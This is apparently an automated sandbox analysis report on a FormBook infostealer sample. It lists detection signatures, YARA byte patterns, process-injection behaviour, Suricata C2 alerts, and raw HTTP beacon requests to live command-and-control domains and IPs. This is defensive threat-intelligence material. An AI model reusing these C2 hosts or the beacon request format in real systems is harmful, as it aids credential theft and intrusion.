Windows Analysis Report
w64HYOhfv1.exe

Overview

General Information

Sample name:w64HYOhfv1.exe
renamed because original name is a hash value
Original sample name:67910182eeeb3ac668faa832fbadfbe41f239b03da3e05a4ed36ea9a65da3d5c.exe
Analysis ID:1529888
MD5:ac184c685020ceff107e43cabba13b4f
SHA1:220f62ae6c76b24985cc3dbf558022fc8ca65c29
SHA256:67910182eeeb3ac668faa832fbadfbe41f239b03da3e05a4ed36ea9a65da3d5c
Tags:exe, user-adrian__luca

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • w64HYOhfv1.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\w64HYOhfv1.exe" MD5: AC184C685020CEFF107E43CABBA13B4F)
    • svchost.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\w64HYOhfv1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ifhdPMDeORMlb.exe (PID: 5460 cmdline: "C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RmClient.exe (PID: 6336 cmdline: "C:\Windows\SysWOW64\RmClient.exe" MD5: CE765DCC7CDFDC1BFD94CCB772C75E41)
          • ifhdPMDeORMlb.exe (PID: 3732 cmdline: "C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.2660000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.2660000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.2660000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.2660000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\w64HYOhfv1.exe", CommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", ParentImage: C:\Users\user\Desktop\w64HYOhfv1.exe, ParentProcessId: 7080, ParentProcessName: w64HYOhfv1.exe, ProcessCommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", ProcessId: 6480, ProcessName: svchost.exe
            Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\w64HYOhfv1.exe", CommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", ParentImage: C:\Users\user\Desktop\w64HYOhfv1.exe, ParentProcessId: 7080, ParentProcessName: w64HYOhfv1.exe, ProcessCommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", ProcessId: 6480, ProcessName: svchost.exe

            AV Detection

            Source: w64HYOhfv1.exe, Avira: detected
            Source: w64HYOhfv1.exe, ReversingLabs: Detection: 55%
            Source: Yara match, File source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: w64HYOhfv1.exe, Joe Sandbox ML: detected
            Source: w64HYOhfv1.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000001.00000002.1963873677.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963858433.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129554800.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ifhdPMDeORMlb.exe, 00000003.00000000.1867261425.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp, ifhdPMDeORMlb.exe, 00000007.00000000.2033224305.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.1964073483.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1847224890.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844685675.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.000000000318E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1965904772.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1964009179.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.1964073483.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1847224890.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844685675.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.4130603764.000000000318E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1965904772.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1964009179.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RmClient.exe, 00000006.00000002.4131092895.000000000361C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003BD2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000006.00000002.4131092895.000000000361C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003BD2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000001.00000002.1963873677.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963858433.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129554800.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_0053C280 FindFirstFileW,FindNextFileW,FindClose (6_2_0053C280)
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 4x nop then xor eax, eax (6_2_00529A00)
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 4x nop then mov ebx, 00000004h (6_2_00D104E1)
            Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then mov ebx, 00000004h (8_2_00000247FBAEC4E1)

            Networking

            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49355 -> 206.119.82.134:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49352 -> 44.213.25.70:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49390 -> 206.119.82.134:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49352 -> 44.213.25.70:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49454 -> 67.223.117.189:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49390 -> 206.119.82.134:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49437 -> 67.223.117.189:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49367 -> 206.119.82.134:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49470 -> 67.223.117.189:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49470 -> 67.223.117.189:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49553 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49377 -> 206.119.82.134:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49593 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49593 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49631 -> 183.181.83.131:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49637 -> 38.47.232.196:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49640 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49634 -> 183.181.83.131:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49643 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49645 -> 154.212.219.2:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49636 -> 38.47.232.196:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49638 -> 38.47.232.196:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49643 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49644 -> 154.212.219.2:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49650 -> 133.130.35.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49646 -> 154.212.219.2:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49659 -> 172.191.244.62:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49659 -> 172.191.244.62:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49661 -> 162.241.244.106:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49641 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49657 -> 172.191.244.62:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49655 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49658 -> 172.191.244.62:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49655 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49633 -> 183.181.83.131:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49652 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49642 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49674 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49674 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49635 -> 183.181.83.131:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49635 -> 183.181.83.131:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49647 -> 154.212.219.2:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49647 -> 154.212.219.2:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49649 -> 133.130.35.90:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49639 -> 38.47.232.196:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49639 -> 38.47.232.196:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49651 -> 133.130.35.90:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49651 -> 133.130.35.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49672 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49656 -> 172.191.244.62:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49654 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49648 -> 133.130.35.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49423 -> 67.223.117.189:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49662 -> 162.241.244.106:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49673 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49653 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49671 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49660 -> 162.241.244.106:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49579 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49563 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49663 -> 162.241.244.106:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49663 -> 162.241.244.106:80
            Source: DNS query: www.uburn.xyz
            Source: DNS query: www.nakama2-sshl.xyz
            Source: DNS query: www.lurknlarkk.xyz
            Source: Joe Sandbox View, IP Address: 172.191.244.62
            Source: Joe Sandbox View, IP Address: 67.223.117.189
            Source: Joe Sandbox View, ASN Name: ATT-INTERNET4US
            Source: Joe Sandbox View, ASN Name: VIMRO-AS15189US
            Source: Joe Sandbox View, ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK
            Source: Joe Sandbox View, ASN Name: AMAZON-AESUS
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /7mju/?rf-LZ=JlCtuN3HqPO8C&AHkx=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc4tgWVH2vgFrx7lu5caWGLmQTjS3LtG8lVAw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.newdaydawning.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /l8if/?AHkx=fb3YagVOau/9jH9JrwpuHsbxrllxr9uMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0IvhyZ1jg35IXHzinqtRNXlFD8GamKybSzcUs8=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.40wxd.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /iqqs/?rf-LZ=JlCtuN3HqPO8C&AHkx=f7Pu0FXPylRYdptkWs+23MtWxvoKJz6PgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb4laqx4Tc9G/2Lb24L4CzfFNZpkDBhe90DBs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.uburn.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /eruc/?AHkx=0pHn1M2gwaL5mql9jSi5Dhpkux55ATuoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJQA9rTbpXDGB78xWioGNWodRvKelboLn2zrA=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.o731lh.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ui3j/?AHkx=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA+4/F1XwzKY9WGJMvD1hFh5nZW5ehHhRHPVA=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nakama2-sshl.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ak5l/?rf-LZ=JlCtuN3HqPO8C&AHkx=eH+SO6exUc8kNdkvUVCoynUPLpD0oidFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhJwia7KRoh2N0l2r+oB94KBnVCOyz53vPt1M= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zz82x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /b8ih/?AHkx=Odz4+FoaeIgH5S8C9OYZQc3ouWeZxTDEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD83GPUGNWv010JVF29ycwpsNNUnGWJNXrEBFE=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /6wpo/?AHkx=s9KIkrkzrqTbzkMmh7Bli3B0wEyBHaCwBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAcV+6tVbS2gqGz3F/PYSng2mbFSIjOzq2Kmk=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.prj81oqde1.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /p9u3/?AHkx=D1Jc/C1nh+BZL85ZeChw3l4+cioj8fKXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1Ewp0jkjvaZxrb1x+aTR+tBdOAHUHhfEgGmf4=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
